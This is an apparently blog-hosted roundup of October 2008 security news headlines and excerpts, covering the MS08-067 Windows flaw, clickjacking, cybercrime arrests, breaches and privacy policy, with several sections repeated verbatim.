IT security spending not darkened by economic gloom
...In fact, despite the gloomy financial outlook, some analysts actually think IT security spending will increase.
In its annual Global State of Information Security Survey published this month, consultancy PricewaterhouseCoopers (PWC) said the more than 7,000 IT security professionals from 119 countries who responded indicated that 44% would increase their spending on security, while 31% said IT security spending would remain the same, 5% anticipated a decrease and 20% didn't know.
25 Percent Of UK Law Firms Admit To Losing Clients Electronic Data By Grey McKenzie Today
... 37% of lawyers believed that if they did lose their mobile device it would be insecure as a hacker, or identity thief, is “cleverer than the average lawyer” and could access the data it contains. A paltry 13% of those that had lost a mobile device were confident it couldn’t be breached, or used against them, as only this small percentage of law firms were security savvy enough to encrypt the data residing on them.
Former sysadmin sentenced for wrecking corporate servers
A federal judge sentenced him Tuesday to six months in prison, followed by three years of supervised release. Patel has separately agreed to pay Pratt-Read $120,000 in restitution, but he may be ordered to pay additional fines by the judge, prosecutors say.
...
In court filings, prosecutors say that the on the Sunday after Thanksgiving, Patel "had a few drinks," and then accessed the Pratt-Read servers from home...
Ohio gov't. contractor suspected in 'Joe the Plumber' privacy breach
Microsoft vows Windows 7 will fix Vista mistakes
In his speech, Sinofsky said Microsoft is learning its lessons from Vista, which was widely criticized by users and the press, and spoofed famously in television advertisements by Apple Inc.
Hackers publish attack code for last week's Windows bug
October 28, 2008 (Computerworld) Just a day after downplaying the vulnerability that caused it to issue an out-of-cycle patch last week, Microsoft Corp. late yesterday warned customers that exploit code had gone public and is being used in additional attacks.
"We've identified the public availability of exploit code that now shows code execution for the vulnerability addressed by MS08-067," said Mike Reavey, operations manager of Microsoft's Security Response Center, in a post to the MSRC blog Monday evening. "This exploit code has been shown to result in remote code execution on Windows Server 2003, Windows XP, and Windows 2000."
...
Just the day before, another Microsoft employee had downplayed the threat posed by the bug in the Windows Server service that Microsoft patched last week...
Microsoft, Yahoo form alliance to tackle lottery scams
Microsoft: We didn't 'forget' Azure trademark
see http://www.microsoft.com/azure/default.mspx for more info on their "cloud-computing" initiative.
Reputation litigation, here we come!
When Dates Attack October 20, 2008
Dating 'alert' sites allow women to put an 'ex' on trial without rebuttal
Economic Crisis May Be Boon For Cybercriminals, Experts Say October 28, 2008
How the global financial crisis is affecting organized cybercrime
"...Organized cybercrime has already begun capitalizing on the global financial crisis, cybercrime experts say, with targeted phishing attacks on customers whose banks have folded, and attacks that scam consumers who may be shopping less online, but are now spending more time at home.
Why Virtualization Security Is Such a Mess
Audio: Security expert Chris Hoff explains why he believes virtualization is not properly understood and how, as a result, "security in the cloud" is a myth. [Security Insights Podcast with CSO Senior Editor Bill Brenner. Runtime 7 minutes, 45 seconds]
Read more
We saw one of these black screens on a legitimate home laptop Monday in the CCC:
Microsoft goes black, making Chinese see red
tech.yahoo.com — An anti-piracy tactic by Microsoft Corp. that turns some computer users' screens black has set off a wave of indignation among Chinese consumers, posing renewed problems for the software maker in the huge China market.More…
Don't Be Dragooned Into the Botnet Army A favorite multipurpose weapon of online thieves is growing larger and more powerful, according to those who combat the threat.
McCain Volunteer Invents Attack Hoax, The Nation, October 24, 2008
From Bruce Schneier's blog:
The Skein Hash Function
NIST is holding a competition to replace the SHA family of hash functions, which have been increasingly under attack. (I wrote about an early NIST hash workshop here.)
Skein is our submission (myself and seven others: Niels Ferguson, Stefan Lucks, Doug Whiting, Mihir Bellare, Tadayoshi Kohno, Jon Callas, and Jesse Walker). Here's the paper:
Microsoft Windows Path Canonicalisation Vulnerability
Issued 6 days ago.
DESCRIPTION:
The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component.
Successful exploitation allows execution of arbitrary code, but requires authenticated access on Windows Vista and Windows Server 2008.
NOTE: The vulnerability is currently being actively exploited.
Windows Live ID just became yet another OpenID-provider.
... they have undoubtedly put even more weight behind the OpenID initiative.
OpenID is an emerging, de facto standard Web protocol for user authentication. It helps eliminate the need for multiple user names across different Web sites, thereby simplifying a user's online experience. Stated another way, you can reuse your OpenID account at different Web sites without having to create a new user name and password at each site you use.
Microsoft Office will float to the cloud with Office Web
With the upcoming release of Office 14, Microsoft today announced Office Web, a suite of five core Office components that will float up into the clouds.
October 28, 2008 - 02:17PM CT - by David Chartier
Big change in business model:
What Does It Mean For The Christian Science Monitor To Go Web Only?
Turkish hacker arrested by FBI made video giving tips for installing ATM skimmers
Paul Fisher October 28, 2008
A Turkish hacker known as "Chao" and arrested as part of the FBI operation against underground forum DarkMarket produced his own training videos. You can watch it here.
Security group: Vulnerability disclosure is impractical
Mark Mayne October 29, 2008
An advisory group contends that the scramble over Dan Kaminsky's DNS flaw discovery proves that full disclosure is simply not feasible.
Wednesday, October 29, 2008
Monday, October 27, 2008
Security News Feed Monday 10/27/08
Lots to go over today. First up: Clickjacking is fixed with the latest Adobe Flash (10.0). Upgrade ASAP!
Scary - weakness in Microsoft making Cisco vulnerable in some cases:
http://www.cisco.com/en/US/products/products_security_advisory09186a0080a183ba.shtml
October 27, 2008 Recent Stock Market Decline Causes Economic Cybercrime to Hit All Time High, According to PandaLabs
http://www.crime-research.org/news/27.10.2008/3641/
Tech Insight: Digital Forensics & Incident Response Go Live - 10/24/2008 3:45:00 PM
'Block the Vote' Tactics Go Online This Election - 10/22/2008 3:45:00 PM
Electronic Privacy Information Center predicts potential for spoofed Websites, fake VOIP call blasts, phishing, and DOS – to suppress voters
Microsoft Blue Hat: Researcher Demos No-Hack Attack - 10/21/2008 4:22:00 PM
Wealth of available online data on individuals, businesses can be used in targeted attacks
How To Save Yourself From Your Kids Online
Security expert Richard B. Lawhorn writes that as parents, we must adapt to new technologies our children are using, including those found on the Internet.
Read more
How to Prevent Cyber Espionage
Security expert Gadi Evron has plenty of experience helping governments fight cyber attacks. In this column, he offers a roadmap companies can use to prevent computer espionage.
Read more
Homeland Security Clears Secure Flight but Watchlists Remain
The Department of Homeland Security announced today the Final Regulations for the Secure Flight program. All airlines will now be required to collect date of birth and gender from customers and provide this information to the TSA for watchlist verification. A DHS Redress number, if previously issued, would also be collected. EPIC has warned in Congressional testimony that accuracy problems will continue to plague Secure Flight unless passengers are able to challenge the government's watchlist determinations. EPIC also recommended that the redress procedures be modified to limit data collection and to prescribe penalties for Privacy Act violations.
Posted by EPIC on October 22, 2008.Permanent link to this item.
Sharepoint Data Security Risks
by Jesper M. Christensen
Articles / Web Application Security
The challenges of securing data on Microsoft SharePoint sites, lists, pages and the information made available through data-links to backend systems (through BDC and manually created data-links).
Microsoft has head in the clouds with new Windows Azure OS
As expected, Microsoft announced a Windows-based "cloud OS" during the first day of PDC. Windows Azure offers virtualized computing, automated service management, and scalable storage and will compete against cloud-based offerings from Amazon and Google.
October 27, 2008 - 12:28PM CT - by Kurt Mackey
More News from RustockOctober 23, 2008
Rustock has now come up with another spamming template using CBS News.
Other Tools Terrrorists Might Use: Voice, Pencils, Fax Machines, Email, Mobile Phones, Etc.
US Customs Agents Can Search Letters at Airports
SAN FRANCISCO (CN) - The 9th Circuit upheld the right of U.S. Customs and Border Patrol agents to search an elderly man's FedEx package at an international airport, and to open and read letters containing sexually suggestive language apparently addressed to an 8-year-old Filipino girl.
Penn hacker sentenced, avoids child porn charges AP - Wed Oct 22, 4:17 AM ET
PHILADELPHIA - A federal judge questioned why a white Ivy League student found during a computer hacking probe with thousands of images of child pornography was not charged with that crime, sparing him a decade-long prison sentence that a black convicted child pornographer faced at the same hearing.
Study: Malware risks are growing exponentially CNET - Tue Oct 21, 8:02 PM ET
A new report from security services provider ScanSafe finds that companies are at increasing risk of having employees inadvertently download backdoors and password stealers onto corporate computers from Web sites that have malicious software hidden on them.
Treasury office faults IRS computer security AP - Thu Oct 16, 1:06 PM ET
WASHINGTON - Two new IRS computer systems that will eventually cost taxpayers almost $2 billion are being put into service despite known security and privacy vulnerabilities, a Treasury watchdog said in a report coming out Thursday.
AVG flags ZoneAlarm as malware CNET - Wed Oct 15, 6:37 PM ET
This post was updated at 3:30 p.m. PDT with comment Check Point.
Al-Qaeda-Affiliated Online Forums Discuss High Tech Tools For Cyber Terror By Grey McKenzie Today
FBI Busts Dark Market Internet Cyber Crime Website Trafficking In Stolen Financial Data By Grey McKenzie 10/22/2008
New European data protection rules likely years away
Europe's data-protection regulatory framework needs updating, but it will be two to three years...
Researchers find problems with RFID passport cards
RFID tags used in two new types of border-crossing documents in the U.S. are vulnerable to snooping... ...1
Separate proofs-of-concept released after rushed Windows fix
Dan Kaplan October 24, 2008
Public and private proof-of-concept code has emerged for the gaping Windows hole plugged by Microsoft on Thursday in an emergency update.
China's internet users lash out at Microsoft's anti-piracy system
Dan Raywood October 24, 2008
Chinese internet users have criticized what they deem to be Microsoft's violation of their right to privacy.
Android vulnerable to drive-by exploit
McAfee antes up against cybercrimeNews Brief, 2008-10-22
The security firm calls for more action from authorities, creates a cybercrime response unit and advisory council, and will hand out grants to anti-crime organizations.
Java Update Promises to Remove Older Versions
Sun Microsystems has released another version of its Java software client. The update, JRE6 Update 10, contains no new security fixes to the most recent version, JRE6 Update 7, but it does appear to fulfill a promise the company made long ago to stop littering users' PCs with outdated, insecure versions of the software.
http://voices.washingtonpost.com/securityfix/2008/10/java_update_promises_to_remove.html
Gimmiv worm feeds on latest Microsoft bug
Most common questions that we've been asked regarding MS08-067
Since the release we have received several great questions regarding MS08-067 (http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx), thus we decided to compile answers for them. We still want to encourage everyone to apply the update.
Can the vulnerability be reached through RPC over HTTP?
No, the vulnerability cannot be reached through RPC over HTTP. RPC over HTTP is an end-to-end protocol that has three roles: client, proxy and server. To be clear, this is different from standard RPC, and the two protocols do not interoperate. Moreover, the only way to hit the vulnerable code is through named pipes, so the Interface security callback will drop the connection when connecting through TCP/IP.
Using Outlook to connect to an Exchange server to access e-mail is a common scenario that uses RPC over HTTP; since the RPC over HTTP proxy is used the Exchange server is not exposed to external attacks.
Further information about RPC over HTTP:
http://msdn.microsoft.com/en-us/library/aa375384.aspx
Further information about using Exchange with RPC over HTTP:
http://technet.microsoft.com/en-us/library/aa996072(EXCHG.65).aspx
Scary - weakness in Microsoft making Cisco vulnerable in some cases:
http://www.cisco.com/en/US/products/products_security_advisory09186a0080a183ba.shtml
October 27, 2008 Recent Stock Market Decline Causes Economic Cybercrime to Hit All Time High, According to PandaLabs
http://www.crime-research.org/news/27.10.2008/3641/
Tech Insight: Digital Forensics & Incident Response Go Live - 10/24/2008 3:45:00 PM
'Block the Vote' Tactics Go Online This Election - 10/22/2008 3:45:00 PM
Electronic Privacy Information Center predicts potential for spoofed Websites, fake VOIP call blasts, phishing, and DOS – to suppress voters
Microsoft Blue Hat: Researcher Demos No-Hack Attack - 10/21/2008 4:22:00 PM
Wealth of available online data on individuals, businesses can be used in targeted attacks
How To Save Yourself From Your Kids Online
Security expert Richard B. Lawhorn writes that as parents, we must adapt to new technologies our children are using, including those found on the Internet.
Read more
How to Prevent Cyber Espionage
Security expert Gadi Evron has plenty of experience helping governments fight cyber attacks. In this column, he offers a roadmap companies can use to prevent computer espionage.
Read more
Homeland Security Clears Secure Flight but Watchlists Remain
The Department of Homeland Security announced today the Final Regulations for the Secure Flight program. All airlines will now be required to collect date of birth and gender from customers and provide this information to the TSA for watchlist verification. A DHS Redress number, if previously issued, would also be collected. EPIC has warned in Congressional testimony that accuracy problems will continue to plague Secure Flight unless passengers are able to challenge the government's watchlist determinations. EPIC also recommended that the redress procedures be modified to limit data collection and to prescribe penalties for Privacy Act violations.
Posted by EPIC on October 22, 2008.Permanent link to this item.
Sharepoint Data Security Risks
by Jesper M. Christensen
Articles / Web Application Security
The challenges of securing data on Microsoft SharePoint sites, lists, pages and the information made available through data-links to backend systems (through BDC and manually created data-links).
Microsoft has head in the clouds with new Windows Azure OS
As expected, Microsoft announced a Windows-based "cloud OS" during the first day of PDC. Windows Azure offers virtualized computing, automated service management, and scalable storage and will compete against cloud-based offerings from Amazon and Google.
October 27, 2008 - 12:28PM CT - by Kurt Mackey
More News from RustockOctober 23, 2008
Rustock has now come up with another spamming template using CBS News.
Other Tools Terrrorists Might Use: Voice, Pencils, Fax Machines, Email, Mobile Phones, Etc.
US Customs Agents Can Search Letters at Airports
SAN FRANCISCO (CN) - The 9th Circuit upheld the right of U.S. Customs and Border Patrol agents to search an elderly man's FedEx package at an international airport, and to open and read letters containing sexually suggestive language apparently addressed to an 8-year-old Filipino girl.
Penn hacker sentenced, avoids child porn charges AP - Wed Oct 22, 4:17 AM ET
PHILADELPHIA - A federal judge questioned why a white Ivy League student found during a computer hacking probe with thousands of images of child pornography was not charged with that crime, sparing him a decade-long prison sentence that a black convicted child pornographer faced at the same hearing.
Study: Malware risks are growing exponentially CNET - Tue Oct 21, 8:02 PM ET
A new report from security services provider ScanSafe finds that companies are at increasing risk of having employees inadvertently download backdoors and password stealers onto corporate computers from Web sites that have malicious software hidden on them.
Treasury office faults IRS computer security AP - Thu Oct 16, 1:06 PM ET
WASHINGTON - Two new IRS computer systems that will eventually cost taxpayers almost $2 billion are being put into service despite known security and privacy vulnerabilities, a Treasury watchdog said in a report coming out Thursday.
AVG flags ZoneAlarm as malware CNET - Wed Oct 15, 6:37 PM ET
This post was updated at 3:30 p.m. PDT with comment Check Point.
Al-Qaeda-Affiliated Online Forums Discuss High Tech Tools For Cyber Terror By Grey McKenzie Today
FBI Busts Dark Market Internet Cyber Crime Website Trafficking In Stolen Financial Data By Grey McKenzie 10/22/2008
New European data protection rules likely years away
Europe's data-protection regulatory framework needs updating, but it will be two to three years...
Researchers find problems with RFID passport cards
RFID tags used in two new types of border-crossing documents in the U.S. are vulnerable to snooping... ...1
Separate proofs-of-concept released after rushed Windows fix
Dan Kaplan October 24, 2008
Public and private proof-of-concept code has emerged for the gaping Windows hole plugged by Microsoft on Thursday in an emergency update.
China's internet users lash out at Microsoft's anti-piracy system
Dan Raywood October 24, 2008
Chinese internet users have criticized what they deem to be Microsoft's violation of their right to privacy.
Android vulnerable to drive-by exploit
McAfee antes up against cybercrimeNews Brief, 2008-10-22
The security firm calls for more action from authorities, creates a cybercrime response unit and advisory council, and will hand out grants to anti-crime organizations.
Java Update Promises to Remove Older Versions
Sun Microsystems has released another version of its Java software client. The update, JRE6 Update 10, contains no new security fixes to the most recent version, JRE6 Update 7, but it does appear to fulfill a promise the company made long ago to stop littering users' PCs with outdated, insecure versions of the software.
http://voices.washingtonpost.com/securityfix/2008/10/java_update_promises_to_remove.html
Gimmiv worm feeds on latest Microsoft bug
Most common questions that we've been asked regarding MS08-067
Since the release we have received several great questions regarding MS08-067 (http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx), thus we decided to compile answers for them. We still want to encourage everyone to apply the update.
Can the vulnerability be reached through RPC over HTTP?
No, the vulnerability cannot be reached through RPC over HTTP. RPC over HTTP is an end-to-end protocol that has three roles: client, proxy and server. To be clear, this is different from standard RPC, and the two protocols do not interoperate. Moreover, the only way to hit the vulnerable code is through named pipes, so the Interface security callback will drop the connection when connecting through TCP/IP.
Using Outlook to connect to an Exchange server to access e-mail is a common scenario that uses RPC over HTTP; since the RPC over HTTP proxy is used the Exchange server is not exposed to external attacks.
Further information about RPC over HTTP:
http://msdn.microsoft.com/en-us/library/aa375384.aspx
Further information about using Exchange with RPC over HTTP:
http://technet.microsoft.com/en-us/library/aa996072(EXCHG.65).aspx
Wednesday, October 15, 2008
Security News Feed Wednesday 10/15/08
Update: Cisco Security Advisory: Multiple Multicast Vulnerabilities in Cisco IOS Software
Yesterday's Microsoft security bulletins are as follows:
MS08-056 Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)
MS08-057 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
MS08-058 Cumulative Security Update for Internet Explorer (956390)
MS08-059 Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)
MS08-060 Vulnerability in Active Directory Could Allow Remote Code Execution (957280)
MS08-061 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)
MS08-062 Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)
MS08-063 Vulnerability in SMB Could Allow Remote Code Execution (957095)
MS08-064 Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841)
MS08-065 Vulnerability in Message Queuing Could Allow Remote Code Execution (951071)
MS08-066 Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803)
Advisory 956391 Cumulative Security Update of ActiveX Kill Bits
FBI: Several nations eye U.S. cybertargets
But FBI official stresses need to protect networks rather than finding source of cyberthreats.
October 15, 2008 (IDG News Service) About two dozen nations have developed cyberattack capabilities and have their eyes on targets inside the U.S. government or businesses, the top cybercrime law enforcement official in the U.S. said today.
"There are countries who have an interest in obtaining information from the U.S., in terms of the electronic theft of data," said Shawn Henry, the assistant director in charge of the FBI's Cyber Division.
FTC, New Zealand hit one of world's largest spam operations
October 15, 2008 (IDG News Service) Government agencies in the U.S. and New Zealand say they have sued the people behind one of the world's largest spamming operations.
The lawsuits were filed in federal court in Illinois and New Zealand High Court in Christchurch over the past week. They describe an international spamming operation run out of New Zealand, Australia and the U.S. that sold the kinds of phony male-enhancement pills, knock-off prescription drugs, sex toys and replica watches that have gummed up e-mail in-boxes for years.
Ex-hacker 'Mafiaboy' tells all in memoir
http://www.crime-research.org/news/14.10.2008/3625/
A former hacker, who temporarily shut down several major websites and led the RCMP and the FBI on a manhunt when he was 15, has written a tell-all memoir about his criminal past.
Microsoft issues mega-patch to crush 20 bugs in Windows, Office, IE
Patch releases push down Microsoft's stock, researcher says
Bush signs PRO-IP antipiracy law
Intellectual Property Bill Becomes Law: Critics Say It Goes Too Far - 10/14/2008 5:54:00 PM New law gives authorities more leeway to prosecute thieves who steal sensitive data for piracy or espionage
Tough economic climate can heighten insider threat
'Experimental' security fix is malware, Microsoft says
Anonymous Proxy Servers: Necessary Or Evil?
Some security experts believe anonymous proxy servers are only necessary if you're up to no good, while others see them as a legitimate tool for research, pen testing and the like. Who's right?
Read more
Radiohead Reveal Success of 'In Rainbows' Download
nme.com — The statistics behind the pay-what-you-like release of Radiohead's 'In Rainbows' album, released on October 10 last year online, have been revealed today.More…
"...Warner Chappell concluded that the new release style was a financial success, but did not reveal whether Radiohead plan to release an album in a similar way in the future."
Teacher's Boozy MySpace Scotches Job
Four Security Lessons From the World Bank Breach
The World Bank is making headlines after a disputed report claims hackers managed to access their secure network for over a year. One security pro offers takeaways that everyone can learn from the breach.
"...The problem is, no matter how much technology you put in place there is always this human element," he said. "Humans can't be upgraded with new patches. But it's humans who are making mistakes and bad decisions which will often introduce security problems into organizations."
NSA's Warrantless Eavesdropping Targets Innocent Americans
Remember when the U.S. government said it was only spying on terrorists? Anyone with any common sense knew it was lying -- power without oversight is always abused -- but even I didn't thinkit was this bad:
Faulk says he and others in his section of the NSA facility at Fort Gordon routinely shared salacious or tantalizing phone calls that had been intercepted, alerting office mates to certain time codes of "cuts" that were available on each operator's computer.
"Hey, check this out," Faulk says he would be told, "there's good phone sex or there's some pillow talk, pull up this call, it's really funny, go check it out. It would be some colonel making pillow talk and we would say, 'Wow, this was crazy'," Faulk told ABC News.
Warrants are a security device. They protect us against government abuse of power.
Posted on October 15, 2008 at 12:39 PM
Insiders dodge security for productivity, RSA saysNews Brief, 2008-10-15
In its latest survey of IT workers, the company finds that more than half found ways to work around security policies to get their work done.
...preliminary investigations into a Qantas Airbus A330 mishap where 51 passengers were injured has concluded that it was due to the Air Data Inertial Reference System feeding incorrect information into the flight control system — not interference from passenger electronics, as Qantas had initially claimed.
Microsoft aims for Vista SP2 before Win 7
Mary Jo Foley: The Windows team is readying second service packs (SP2) for Vista--and for its server complement, Windows Server 2008--and is aiming to deliver these SP2s before it releases Windows 7.
Clickjacking
Lately, the topic of clickjacking has gained popularity in discussions on the internet. It is a new type of web attack. I decided to find out what it’s all about.
I found an online video of OWASP NYC AppSec 2008 here. In the video, Jeremiah Grossman & Robert “RSnake” Hansen reported this new vulnerability in a presentation titled “New Zero-Day Browser Exploits –ClickJacking”. I also found a demo of this vulnerability here.
In the videos they describe only parts of the vulnerability, but it is enough for us to have a basic idea of what clickjacking is.
To explain this, let’s use an example. You have a web page A controlled by an attacker. A contains an element B. In a clickjack attack, B would be set to transparent and the z-index property of the layer set to higher than other elements of page A via CSS. B will also need to be so big so that the user can click it’s content. The attacker can then place any button to do anything he wants in B. Then the attacker can place some buttons on page A. The location of the buttons in B must match the buttons in A. So when the user clicks on a button on page A, they are actually clicking the button in B because the z-index property of B’s buttons are higher than A’s buttons. This attack uses DHTML, does not require Javascript, so disabling Javascript will not help.
This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich media internet application today. Adobe has released a security advisory and provided a workaround.
Cybersting: FBI ran DarkMarket forum to catch cybercriminals
Angela Moscaritolo October 14, 2008
The FBI used the DarkMarket.ws cybercriminal forum to create profiles of identity thieves looking to share tips and purchase stolen data.
More than 5,000 pirated eBay credentials found on web
Dan Kaplan October 14, 2008
A security researcher has discovered a loot of eBay credentials on a Google cache.
Frame injection exploits Google flaw
Angela Moscaritolo October 13, 2008
The login page for Google Mail can be spoofed so that an attacker can steal a user's credentials.
FBI sees rise in computer crimeReuters - 19 minutes ago
WASHINGTON (Reuters) - Computer spying and theft of personal information have risen notably in the past year, costing tens of millions of dollars and threatening U.S. security, the FBI's cyber division head said on Wednesday.
30 Million Computers are Infected by Fake Antivirus Programs Generating Nearly $14 Million for Cyber-crooks By Grey McKenzie Today
Three potential scenarios for the future of identity federation
I spent a day last week with SURFnet. And, no, SURFnet has nothing to do with Moondoggie, Gidget,...
Yesterday's Microsoft security bulletins are as follows:
MS08-056 Vulnerability in Microsoft Office Could Allow Information Disclosure (957699)
MS08-057 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
MS08-058 Cumulative Security Update for Internet Explorer (956390)
MS08-059 Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695)
MS08-060 Vulnerability in Active Directory Could Allow Remote Code Execution (957280)
MS08-061 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)
MS08-062 Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)
MS08-063 Vulnerability in SMB Could Allow Remote Code Execution (957095)
MS08-064 Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841)
MS08-065 Vulnerability in Message Queuing Could Allow Remote Code Execution (951071)
MS08-066 Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803)
Advisory 956391 Cumulative Security Update of ActiveX Kill Bits
FBI: Several nations eye U.S. cybertargets
But FBI official stresses need to protect networks rather than finding source of cyberthreats.
October 15, 2008 (IDG News Service) About two dozen nations have developed cyberattack capabilities and have their eyes on targets inside the U.S. government or businesses, the top cybercrime law enforcement official in the U.S. said today.
"There are countries who have an interest in obtaining information from the U.S., in terms of the electronic theft of data," said Shawn Henry, the assistant director in charge of the FBI's Cyber Division.
FTC, New Zealand hit one of world's largest spam operations
October 15, 2008 (IDG News Service) Government agencies in the U.S. and New Zealand say they have sued the people behind one of the world's largest spamming operations.
The lawsuits were filed in federal court in Illinois and New Zealand High Court in Christchurch over the past week. They describe an international spamming operation run out of New Zealand, Australia and the U.S. that sold the kinds of phony male-enhancement pills, knock-off prescription drugs, sex toys and replica watches that have gummed up e-mail in-boxes for years.
Ex-hacker 'Mafiaboy' tells all in memoir
http://www.crime-research.org/news/14.10.2008/3625/
A former hacker, who temporarily shut down several major websites and led the RCMP and the FBI on a manhunt when he was 15, has written a tell-all memoir about his criminal past.
Microsoft issues mega-patch to crush 20 bugs in Windows, Office, IE
Patch releases push down Microsoft's stock, researcher says
Bush signs PRO-IP antipiracy law
Intellectual Property Bill Becomes Law: Critics Say It Goes Too Far - 10/14/2008 5:54:00 PM New law gives authorities more leeway to prosecute thieves who steal sensitive data for piracy or espionage
Tough economic climate can heighten insider threat
'Experimental' security fix is malware, Microsoft says
Anonymous Proxy Servers: Necessary Or Evil?
Some security experts believe anonymous proxy servers are only necessary if you're up to no good, while others see them as a legitimate tool for research, pen testing and the like. Who's right?
Read more
Radiohead Reveal Success of 'In Rainbows' Download
nme.com — The statistics behind the pay-what-you-like release of Radiohead's 'In Rainbows' album, released on October 10 last year online, have been revealed today.More…
"...Warner Chappell concluded that the new release style was a financial success, but did not reveal whether Radiohead plan to release an album in a similar way in the future."
Teacher's Boozy MySpace Scotches Job
Four Security Lessons From the World Bank Breach
The World Bank is making headlines after a disputed report claims hackers managed to access their secure network for over a year. One security pro offers takeaways that everyone can learn from the breach.
"...The problem is, no matter how much technology you put in place there is always this human element," he said. "Humans can't be upgraded with new patches. But it's humans who are making mistakes and bad decisions which will often introduce security problems into organizations."
NSA's Warrantless Eavesdropping Targets Innocent Americans
Remember when the U.S. government said it was only spying on terrorists? Anyone with any common sense knew it was lying -- power without oversight is always abused -- but even I didn't thinkit was this bad:
Faulk says he and others in his section of the NSA facility at Fort Gordon routinely shared salacious or tantalizing phone calls that had been intercepted, alerting office mates to certain time codes of "cuts" that were available on each operator's computer.
"Hey, check this out," Faulk says he would be told, "there's good phone sex or there's some pillow talk, pull up this call, it's really funny, go check it out. It would be some colonel making pillow talk and we would say, 'Wow, this was crazy'," Faulk told ABC News.
Warrants are a security device. They protect us against government abuse of power.
Posted on October 15, 2008 at 12:39 PM
Insiders dodge security for productivity, RSA saysNews Brief, 2008-10-15
In its latest survey of IT workers, the company finds that more than half found ways to work around security policies to get their work done.
...preliminary investigations into a Qantas Airbus A330 mishap where 51 passengers were injured has concluded that it was due to the Air Data Inertial Reference System feeding incorrect information into the flight control system — not interference from passenger electronics, as Qantas had initially claimed.
Microsoft aims for Vista SP2 before Win 7
Mary Jo Foley: The Windows team is readying second service packs (SP2) for Vista--and for its server complement, Windows Server 2008--and is aiming to deliver these SP2s before it releases Windows 7.
Clickjacking
Lately, the topic of clickjacking has gained popularity in discussions on the internet. It is a new type of web attack. I decided to find out what it’s all about.
I found an online video of OWASP NYC AppSec 2008 here. In the video, Jeremiah Grossman & Robert “RSnake” Hansen reported this new vulnerability in a presentation titled “New Zero-Day Browser Exploits –ClickJacking”. I also found a demo of this vulnerability here.
In the videos they describe only parts of the vulnerability, but it is enough for us to have a basic idea of what clickjacking is.
To explain this, let’s use an example. You have a web page A controlled by an attacker. A contains an element B. In a clickjack attack, B would be set to transparent and the z-index property of the layer set to higher than other elements of page A via CSS. B will also need to be so big so that the user can click it’s content. The attacker can then place any button to do anything he wants in B. Then the attacker can place some buttons on page A. The location of the buttons in B must match the buttons in A. So when the user clicks on a button on page A, they are actually clicking the button in B because the z-index property of B’s buttons are higher than A’s buttons. This attack uses DHTML, does not require Javascript, so disabling Javascript will not help.
This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich media internet application today. Adobe has released a security advisory and provided a workaround.
Cybersting: FBI ran DarkMarket forum to catch cybercriminals
Angela Moscaritolo October 14, 2008
The FBI used the DarkMarket.ws cybercriminal forum to create profiles of identity thieves looking to share tips and purchase stolen data.
More than 5,000 pirated eBay credentials found on web
Dan Kaplan October 14, 2008
A security researcher has discovered a loot of eBay credentials on a Google cache.
Frame injection exploits Google flaw
Angela Moscaritolo October 13, 2008
The login page for Google Mail can be spoofed so that an attacker can steal a user's credentials.
FBI sees rise in computer crimeReuters - 19 minutes ago
WASHINGTON (Reuters) - Computer spying and theft of personal information have risen notably in the past year, costing tens of millions of dollars and threatening U.S. security, the FBI's cyber division head said on Wednesday.
30 Million Computers are Infected by Fake Antivirus Programs Generating Nearly $14 Million for Cyber-crooks By Grey McKenzie Today
Three potential scenarios for the future of identity federation
I spent a day last week with SURFnet. And, no, SURFnet has nothing to do with Moondoggie, Gidget,...
Monday, October 13, 2008
Security News Feed Monday 10/13/08
Cost-cutting, greater efficiencies to be topics at SNW
Report: World Bank servers breached repeatedly
World Bank Hacked, Sensitive Data Exposed - 10/10/2008 5:10:00 PM
Hacked Web servers, a stolen administrative account, and lot of unanswered questions
Google allies with click-fraud-detection firm Click Forensics
Why some security pros hate SharePoint
Exploit code loose for six-month-old Windows bug
Over half of U.K. firms have lost data
U.S. proposes digital signing of DNS root zone file
Security experts for years have advocated the adoption of DNSSEC, but implementation has been patchy. The U.S. government has said it will use DNSSEC for its .gov domain. Country-code top-level domain operators in Sweden (.se), Brazil (.br), Puerto Rico (.pr) and Bulgaria (.bg) are also using DNSSEC. The operator of the .org TLD has also committed to the system, according to the Commerce Department.
Data Center Security Tools to Not Overlook
Endpoint technologies and virtualization software get a lot of ink these days, but here's a quick look at five other key security areas addressed by data-center tools.
Read more
Can you say "next year's budget?"
Fewer People Downloading Music Illegally
telegraph.co.uk — Fewer people are downloading music from the internet illegally because they are frightened about having their connections cut off, according to new research. More…
Oct 12, 9:05 amSix Essential Apple iPhone Security Tips
Security is a tech manager's top concern when it comes to mobile devices--here's how to use them to your advantage with minimal risk.
Oct 11, 2:18 pmVendors, Cops, Profs Team to Study Cybercrime
Tech vendors and the Secret Service are among those working with an evaluation of trends and best practices for security.
Oct 11, 6:00 amMicrosoft Readies Flood of Patches
The 11 patches include 4 critical fixes, plus updates to Windows, Office, and IE.
